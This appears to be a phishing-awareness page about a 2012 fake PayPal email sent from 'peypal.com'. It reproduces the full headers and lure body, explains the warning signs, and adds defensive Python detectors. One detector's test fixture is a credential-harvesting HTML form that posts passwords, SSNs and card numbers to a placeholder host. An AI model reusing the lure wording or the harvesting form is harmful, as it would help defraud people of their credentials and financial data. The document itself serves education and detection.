Your Account Has Been Limited PayPal Case ID PP-658-119-347
VERY IMPORTANT INFORMATION, READ THIS FIRST: The example and associated information published on this page are subject to the SHPAMEE Terms Of Use. Please familiarise yourself with these terms before viewing or using any information on this page.
Header:
X-Account-Key: account6
X-UIDL: x
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Delivered-To: x
Received: by 10.58.56.135 with SMTP id a7csp532149veq;
Wed, 17 Oct 2012 14:00:19 -0700 (PDT)
Received: by 10.50.153.229 with SMTP id vj5mr2885442igb.50.1350507618604;
Wed, 17 Oct 2012 14:00:18 -0700 (PDT)
Return-Path: <service@peypal.com>
Received: from vps.citysoftech.com ([67.202.92.45])
by mx.google.com with ESMTPS id ak4si22864359icc.58.2012.10.17.14.00.17
(version=TLSv1/SSLv3 cipher=OTHER);
Wed, 17 Oct 2012 14:00:18 -0700 (PDT)
Received-SPF: neutral (google.com: 67.202.92.45 is neither permitted nor denied by best guess record for domain of
service@peypal.com) client-ip=67.202.92.45;
Authentication-Results: mx.google.com; spf=neutral (google.com: 67.202.92.45 is neither permitted nor denied by best
guess record for domain of service@peypal.com) smtp.mail=service@peypal.com
Message-Id: <x@mx.google.com>
Received: from [85.17.249.195] (helo=User)
by vps.citysoftech.com with esmtpa (Exim 4.69)
(envelope-from <service@peypal.com>)
id 1TOaqG-0000R6-F4; Wed, 17 Oct 2012 16:07:59 -0500
From: "service@x"<service@peypal.com>
To: x
Subject: Your Account Has Been Limited PayPal Case ID PP-658-119-347
Date: Wed, 17 Oct 2012 20:57:27 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00B6_01C2A9A6.6DA7801E"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - vps.citysoftech.com
X-AntiAbuse: Original Domain - cybertopcops.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - peypal.com
X-Source:
X-Source-Args:
X-Source-Dir:
Body:
Please complete the attached form to verify your Profile information and restore your account access.
Personal Information Profile
Make sure you enter the information accurately, and according to the formats required. Fill in all the required fields.
Dear customer,
As part of our efforts to provide a safe and secure environment for the online
community, we regularly screen account activity. Our review of your account has identified an issue
regarding its safe use. We have placed a restriction on your account as a precaution.
To lift the restriction we will require some further information from you.
If, once we review your further information and we're confident that the
use of your account does not present a safety risk to our service and
customers, we'll be happy to reinstate your account.
We have sent you an attachment which contains all the necessary steps in order to restore your account access.
Download and open it in your browser.
After we have gathered the necessary information, you will regain full access to your account.
We thank you for your prompt attention to this matter.
Very sincerely,
Comments:
Personal Information Profile
Make sure you enter the information accurately, and according to the formats required.
Fill in all the required fields.
Dear customer
First they tell you what to do and THEN they greet you, with one of those generic "Dear customer" greetings. This should already tell you that you are not really dealing with an e-mail from PayPal. As a matter of fact, if you paid any attention to the From address, you should have noticed the typo in service@peypal.com. That gives the scam away immediately.
We still have trouble understanding how to download an attachment that is already attached to an e-mail that has already been downloaded. Once you open the attachment, a web page that looks exactly like the official PayPal website will load in your browser. You should notice that the address in the address bar does not point to paypal.com, but actually to a file on your computer's hard drive. Yes, all the information you enter on this "web page" is collected on your computer and sent to a remote phishing site.
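The sender-side giveaways above can be checked mechanically. The following is an added example, not part of the original page: it reads header lines copied from this sample and flags the lookalike From domain, the non-passing SPF result and the brand name used from a foreign domain. The `PROTECTED` list, the distance threshold of 2 and the finding labels are assumptions made for the illustration.

```python
import email
from email.utils import parseaddr

# Header lines copied from the sample above (recipient fields omitted).
SAMPLE = (
    'Return-Path: <service@peypal.com>\n'
    'Authentication-Results: mx.google.com; spf=neutral (google.com: 67.202.92.45 is '
    'neither permitted nor denied by best guess record for domain of '
    'service@peypal.com) smtp.mail=service@peypal.com\n'
    'From: "service@x"<service@peypal.com>\n'
    'Subject: Your Account Has Been Limited PayPal Case ID PP-658-119-347\n'
    '\n'
)

PROTECTED = ["paypal.com"]  # assumption: brand domains worth guarding


def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage_headers(raw, protected=PROTECTED):
    """Return a list of findings for one message's headers."""
    msg = email.message_from_string(raw)
    findings = []
    _, addr = parseaddr(msg.get("From", ""))
    domain = addr.rpartition("@")[2].lower()
    for brand in protected:
        # Distance 0 is the real domain; 1-2 edits is a typo-squat candidate.
        if 0 < edit_distance(domain, brand) <= 2:
            findings.append(f"lookalike:{domain}~{brand}")
    auth = msg.get("Authentication-Results", "")
    spf = next((t.split("=", 1)[1] for t in auth.split() if t.startswith("spf=")), "none")
    if spf != "pass":
        findings.append(f"spf:{spf}")
    if "paypal" in msg.get("Subject", "").lower() and domain not in protected:
        findings.append("brand-in-subject-from-other-domain")
    return findings
```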
The first page of the phishing form looks like this:
Did you notice that the password is not masked? This is another sign that you are not entering the information on the real PayPal website.
The second page collects the following information:
Once again, a lot of personal information. The social security number is not validated in any way, so you can enter absolutely any rubbish in these fields.
The last page collects the following information:
We entered a random bunch of numbers and it became clear that the page only does some basic validation and does not really verify that the credit card number is valid. This is why it takes less than 30 seconds: firstly, the form only collects data and does not validate anything; secondly, the form is hosted locally on your computer, so it is supposed to be fast.
The form submits the data to a remote website, either hacked or owned by the phishing scammers. It then redirects to the official PayPal website, and since the scammers only collected your information, you should be able to log in as normal, just like the e-mail said. This is a very clever move by the scammers because the victim will continue using PayPal without suspecting a thing.
Phishing scammers are moving away from the old-fashioned phishing method of including a link to the phishing site. Most phishing scams these days involve some HTML attachment that has to be opened. Remember, PayPal will never send you an e-mail requesting any form of personal information, nor will they send you an e-mail with some HTML form attached to it.
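The attachment behaviour described above (a locally opened HTML form that collects credentials and posts them to a remote host, with the password field left unmasked) is something a mail filter can look for before delivery. The following is an added example, not part of the original page: the attachment markup is constructed for the illustration, and the field names, the `SENSITIVE` hints and the `.invalid` host are placeholders, since the page does not reproduce the real attachment.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("pass", "ssn", "social", "card", "cvv")  # assumed field-name hints

# Constructed attachment; field names and the .invalid host are placeholders.
SAMPLE_ATTACHMENT = """
<html><body>
<form method="post" action="http://collector.example.invalid/save.php">
  <input type="text" name="login_email">
  <input type="text" name="login_password">
  <input type="text" name="ssn">
  <input type="text" name="card_number">
  <input type="submit" value="Continue">
</form>
</body></html>
"""


class FormAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.remote_actions = []  # hosts that forms submit to
        self.sensitive = []       # input names that look sensitive
        self.unmasked = []        # password-like inputs not type=password

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # A relative action has no hostname; an absolute URL does.
            host = urlparse(a.get("action", "")).hostname
            if host:
                self.remote_actions.append(host)
        elif tag == "input":
            name = a.get("name", "").lower()
            if any(hint in name for hint in SENSITIVE):
                self.sensitive.append(name)
            if "pass" in name and a.get("type", "text").lower() != "password":
                self.unmasked.append(name)


def audit_html_attachment(html):
    """Summarise form behaviour; quarantine if sensitive data leaves for a remote host."""
    p = FormAudit()
    p.feed(html)
    p.close()
    return {"remote_actions": p.remote_actions, "sensitive": p.sensitive,
            "unmasked": p.unmasked,
            "quarantine": bool(p.remote_actions and p.sensitive)}
```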